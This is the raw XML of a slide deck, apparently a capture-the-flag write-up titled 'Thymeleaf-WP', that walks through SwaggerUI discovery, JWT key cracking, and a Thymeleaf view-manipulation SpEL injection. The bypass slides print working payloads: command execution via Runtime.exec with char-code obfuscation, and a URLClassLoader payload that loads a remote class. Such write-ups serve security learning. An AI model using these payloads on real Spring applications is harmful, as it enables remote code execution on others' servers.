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</p:sldIdLst>
  <p:sldSz cx="9144000" cy="51435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ac56e1e99f_1_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ac56e1e99f_1_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ac56e1e99f_1_1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ac56e1e99f_1_1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ac56e1e99f_4_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ac56e1e99f_4_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ac56e1e99f_0_4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ac56e1e99f_0_4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ac56e1e99f_4_1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ac56e1e99f_4_1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ac56e1e99f_4_2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ac56e1e99f_4_2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</a:fld>
            <a:endParaRPr lang="zh-C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5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/veracode-research/spring-view-manipulation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Thymeleaf-WP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p13"/>
          <p:cNvSpPr txBox="1"/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LFY@r3kapig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Step1 - SwaggerUI</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p14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/swagger-ui.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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2498650" y="1691250"/>
            <a:ext cx="4411700" cy="2877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Step2 - JWTCrack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p15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key: admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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2922825" y="1345250"/>
            <a:ext cx="5291398" cy="3223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Step3 - Thymeleaf view manipulation vuln</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p16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PUT/GET/POST → @ResponseBody</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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zh-CN"/>
              <a:t>DELETE → void</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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206500" y="2249554"/>
            <a:ext cx="8731000" cy="2147947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6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226500" y="3225100"/>
            <a:ext cx="8691003" cy="1854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Step3 - Thymeleaf view manipulation vuln</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p17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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/veracode-research/spring-view-manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" u="sng">
              <a:solidFill>
                <a:schemeClr val="hlink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zh-CN"/>
              <a:t>/auth/user/{username}    →  /auth/user/__$%7BT(java.lang.Runtime)%7D__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::x. </a:t>
            </a:r>
            <a:endParaRPr b="1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341388" y="2571751"/>
            <a:ext cx="8461223" cy="158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Step4 - Bypass URISpelFilter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p18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CN"/>
              <a:t>Response Payload:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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zh-CN"/>
              <a:t>/auth/user/__$%7Bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(T(String).valueOf(new%20char%5b%5d%7B119,104,111,97,109,105%7D)).getInputStream()).next()%7D__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::x.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr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98440" y="3054550"/>
            <a:ext cx="8747127" cy="151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Step4 - Bypass URISpelFilter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p19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CN"/>
              <a:t>URLClassLoader is also feasible</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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zh-CN"/>
              <a:t>/auth/role/__$%7Bnew%20java.net.URLClassLoader(new%20java.net.URL%5B%5D%7Bnew%20java.net.URL(T(String).valueOf(new%20char%5B%5D%20%7B...%7D))%7D).loadClass(T(String).valueOf(new%20char%5B%5D%7B...%7D)).getConstructor(T(String),%20T(Integer)).newInstance(T(String).valueOf(new%20char%5B%5D%20%7B...%7D),%204321).toString()%7D__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::.x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951</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat/>
  <Paragraphs>36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7" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>方正书宋_GBK</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>汉仪书宋二KW</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Simple Dark</vt:lpstr>
      <vt:lpstr>Thymeleaf-WP</vt:lpstr>
      <vt:lpstr>Step1 - SwaggerUI</vt:lpstr>
      <vt:lpstr>Step2 - JWTCrack</vt:lpstr>
      <vt:lpstr>Step3 - Thymeleaf view manipulation vuln</vt:lpstr>
      <vt:lpstr>Step3 - Thymeleaf view manipulation vuln</vt:lpstr>
      <vt:lpstr>Step4 - Bypass URISpelFilter</vt:lpstr>
      <vt:lpstr>Step4 - Bypass URISpelFilter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Thymeleaf-WP</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy>lfy</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-25T06:46:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-25T06:46:49Z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2052-2.8.0.4624</vt:lpwstr>
  </property>
</Properties>
</file>